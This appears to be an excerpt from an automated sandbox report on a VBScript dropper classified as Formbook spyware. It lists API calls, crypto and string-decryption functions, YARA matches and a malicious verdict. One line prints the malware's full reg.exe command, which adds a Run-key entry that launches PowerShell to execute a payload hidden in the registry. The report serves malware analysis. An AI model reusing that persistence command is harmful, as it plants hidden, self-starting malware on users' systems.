Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882AF0 NtWriteFile,	17_2_24882AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882CF0 NtOpenProcess,	17_2_24882CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882C00 NtQueryInformationProcess,	17_2_24882C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882D00 NtSetInformationFile,	17_2_24882D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882D10 NtMapViewOfSection,	17_2_24882D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24883010 NtOpenDirectoryObject,	17_2_24883010
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24883D10 NtOpenProcessToken,	17_2_24883D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882D30 NtUnmapViewOfSection,	17_2_24882D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882E30 NtWriteVirtualMemory,	17_2_24882E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882F30 NtCreateSection,	17_2_24882F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24884340 NtSetContextThread,	17_2_24884340
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24884650 NtSuspendThread,	17_2_24884650
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882C60 NtCreateKey,	17_2_24882C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882F60 NtCreateProcessEx,	17_2_24882F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24883D70 NtOpenThread,	17_2_24883D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_075EE7D1 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	17_2_075EE7D1
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03924340 NtSetContextThread,LdrInitializeThunk,	22_2_03924340
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03923090 NtSetValueKey,LdrInitializeThunk,	22_2_03923090
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03924650 NtSuspendThread,LdrInitializeThunk,	22_2_03924650
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039235C0 NtCreateMutant,LdrInitializeThunk,	22_2_039235C0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922BA0 NtEnumerateValueKey,LdrInitializeThunk,	22_2_03922BA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	22_2_03922BF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922BE0 NtQueryValueKey,LdrInitializeThunk,	22_2_03922BE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922B60 NtClose,LdrInitializeThunk,	22_2_03922B60
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922AD0 NtReadFile,LdrInitializeThunk,	22_2_03922AD0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922AF0 NtWriteFile,LdrInitializeThunk,	22_2_03922AF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039239B0 NtGetContextThread,LdrInitializeThunk,	22_2_039239B0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922FB0 NtResumeThread,LdrInitializeThunk,	22_2_03922FB0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922FE0 NtCreateFile,LdrInitializeThunk,	22_2_03922FE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922F30 NtCreateSection,LdrInitializeThunk,	22_2_03922F30
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922E80 NtReadVirtualMemory,LdrInitializeThunk,	22_2_03922E80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922EE0 NtQueueApcThread,LdrInitializeThunk,	22_2_03922EE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922DD0 NtDelayExecution,LdrInitializeThunk,	22_2_03922DD0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922DF0 NtQuerySystemInformation,LdrInitializeThunk,	22_2_03922DF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922D10 NtMapViewOfSection,LdrInitializeThunk,	22_2_03922D10
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922D30 NtUnmapViewOfSection,LdrInitializeThunk,	22_2_03922D30
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922CA0 NtQueryInformationToken,LdrInitializeThunk,	22_2_03922CA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922C70 NtFreeVirtualMemory,LdrInitializeThunk,	22_2_03922C70
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922C60 NtCreateKey,LdrInitializeThunk,	22_2_03922C60
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03923010 NtOpenDirectoryObject,	22_2_03923010
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922B80 NtQueryInformationFile,	22_2_03922B80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922AB0 NtWaitForSingleObject,	22_2_03922AB0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922F90 NtProtectVirtualMemory,	22_2_03922F90
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922FA0 NtQuerySection,	22_2_03922FA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922F60 NtCreateProcessEx,	22_2_03922F60
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922EA0 NtAdjustPrivilegesToken,	22_2_03922EA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922E30 NtWriteVirtualMemory,	22_2_03922E30
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922DB0 NtEnumerateKey,	22_2_03922DB0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03923D10 NtOpenProcessToken,	22_2_03923D10
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922D00 NtSetInformationFile,	22_2_03922D00
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03923D70 NtOpenThread,	22_2_03923D70
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922CC0 NtQueryVirtualMemory,	22_2_03922CC0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922CF0 NtOpenProcess,	22_2_03922CF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03922C00 NtQueryInformationProcess,	22_2_03922C00
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F57680 NtCreateFile,	22_2_02F57680
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F577E0 NtReadFile,	22_2_02F577E0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F57AC0 NtAllocateVirtualMemory,	22_2_02F57AC0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F578D0 NtDeleteFile,	22_2_02F578D0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F57970 NtClose,	22_2_02F57970

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD348CD892	8_2_00007FFD348CD892
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD348CCAE6	8_2_00007FFD348CCAE6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD348C6238	8_2_00007FFD348C6238
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD348C2658	8_2_00007FFD348C2658
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD348C3BFB	8_2_00007FFD348C3BFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD348C53F0	8_2_00007FFD348C53F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_08451010	11_2_08451010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_084518E0	11_2_084518E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_08450CC8	11_2_08450CC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975E1A	17_3_08975E1A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975E1A	17_3_08975E1A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975D31	17_3_08975D31
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975D31	17_3_08975D31
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976B3F	17_3_08976B3F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976B3F	17_3_08976B3F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08973A3B	17_3_08973A3B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08973A3B	17_3_08973A3B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08974326	17_3_08974326
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08974326	17_3_08974326
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976ACF	17_3_08976ACF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976ACF	17_3_08976ACF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976B4F	17_3_08976B4F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976B4F	17_3_08976B4F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976C6F	17_3_08976C6F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976ACF	17_3_08976ACF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976CC0	17_3_08976CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976ACF	17_3_08976ACF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976ACF	17_3_08976ACF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975E1A	17_3_08975E1A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975E1A	17_3_08975E1A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08973A3B	17_3_08973A3B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08973A3B	17_3_08973A3B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976C6F	17_3_08976C6F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975D31	17_3_08975D31
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975D31	17_3_08975D31
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976B3F	17_3_08976B3F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976B3F	17_3_08976B3F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08974326	17_3_08974326
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08974326	17_3_08974326
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976B4F	17_3_08976B4F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08976B4F	17_3_08976B4F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24819B80	17_2_24819B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24813FD2	17_2_24813FD2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24813FD5	17_2_24813FD5
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Code function: 21_2_03A615DB	21_2_03A615DB
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Code function: 21_2_03A63388	21_2_03A63388
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Code function: 21_2_03A6337F	21_2_03A6337F
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Code function: 21_2_03A61627	21_2_03A61627
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Code function: 21_2_03A61628	21_2_03A61628
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Code function: 21_2_03A635A8	21_2_03A635A8
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Code function: 21_2_03A80D08	21_2_03A80D08
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Code function: 21_2_03A69D06	21_2_03A69D06
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Code function: 21_2_03A69D08	21_2_03A69D08
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0393739A	22_2_0393739A
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039B03E6	22_2_039B03E6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038FE3F0	22_2_038FE3F0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039A132D	22_2_039A132D
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038DD34C	22_2_038DD34C
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039AA352	22_2_039AA352
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F52A0	22_2_038F52A0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0390B2C0	22_2_0390B2C0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039912ED	22_2_039912ED
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03990274	22_2_03990274
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039B01AA	22_2_039B01AA
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038FB1B0	22_2_038FB1B0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039A81CC	22_2_039A81CC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0398A118	22_2_0398A118
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038E0100	22_2_038E0100
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03978158	22_2_03978158
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039BB16B	22_2_039BB16B
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0392516C	22_2_0392516C
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038DF172	22_2_038DF172
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F70C0	22_2_038F70C0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0399F0CC	22_2_0399F0CC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039A70E9	22_2_039A70E9
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039AF0E0	22_2_039AF0E0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039AF7B0	22_2_039AF7B0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038EC7C0	22_2_038EC7C0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03914750	22_2_03914750
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F0770	22_2_038F0770
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039A16CC	22_2_039A16CC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0390C6E0	22_2_0390C6E0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039B0591	22_2_039B0591
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0398D5B0	22_2_0398D5B0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F0535	22_2_038F0535
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039A7571	22_2_039A7571
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0399E4F6	22_2_0399E4F6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039AF43F	22_2_039AF43F
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039A2446	22_2_039A2446
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038E1460	22_2_038E1460
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0390FB80	22_2_0390FB80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039A6BD7	22_2_039A6BD7
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03965BF0	22_2_03965BF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0392DBF9	22_2_0392DBF9
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039AAB40	22_2_039AAB40
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039AFB76	22_2_039AFB76
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038EEA80	22_2_038EEA80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03935AA0	22_2_03935AA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0398DAAC	22_2_0398DAAC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0399DAC6	22_2_0399DAC6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039AFA49	22_2_039AFA49
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039A7A46	22_2_039A7A46
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03963A6C	22_2_03963A6C
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F29A0	22_2_038F29A0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039BA9A6	22_2_039BA9A6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0390B950	22_2_0390B950
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F9950	22_2_038F9950
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03906962	22_2_03906962
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038D68B8	22_2_038D68B8
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0391E8F0	22_2_0391E8F0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F38E0	22_2_038F38E0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0395D800	22_2_0395D800
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F2840	22_2_038F2840
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038FA840	22_2_038FA840
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F1F92	22_2_038F1F92
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039AFFB1	22_2_039AFFB1
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038E2FC8	22_2_038E2FC8
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038FCFE0	22_2_038FCFE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039AFF09	22_2_039AFF09
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03910F30	22_2_03910F30
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03932F28	22_2_03932F28
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03964F40	22_2_03964F40
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03902E90	22_2_03902E90
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039ACE93	22_2_039ACE93
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F9EB0	22_2_038F9EB0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039AEEDB	22_2_039AEEDB
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039AEE26	22_2_039AEE26
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F0E59	22_2_038F0E59
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03908DBF	22_2_03908DBF
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_0390FDC0	22_2_0390FDC0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038EADE0	22_2_038EADE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038FAD00	22_2_038FAD00
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039A1D5A	22_2_039A1D5A
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F3D40	22_2_038F3D40
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039A7D73	22_2_039A7D73
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03990CB5	22_2_03990CB5
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_039AFCF2	22_2_039AFCF2
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038E0CF2	22_2_038E0CF2
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_038F0C00	22_2_038F0C00
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_03969C32	22_2_03969C32
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F41270	22_2_02F41270
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F3A6E0	22_2_02F3A6E0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F3A6DF	22_2_02F3A6DF
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F3C660	22_2_02F3C660
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F3C440	22_2_02F3C440
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F3C437	22_2_02F3C437
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F42DC0	22_2_02F42DC0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F59DC0	22_2_02F59DC0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 22_2_02F42DBE	22_2_02F42DBE

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 038DB970 appears 268 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 03937E54 appears 96 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 0396F290 appears 105 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 03925130 appears 36 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 0395EA12 appears 86 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: 01105751.vbs

Initial sample: Strings found which are bigger than 50

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"

Yara signature match

Source: amsi64_5692.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_6096.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5692, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@33/10@3/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Sagsgningerne.Int

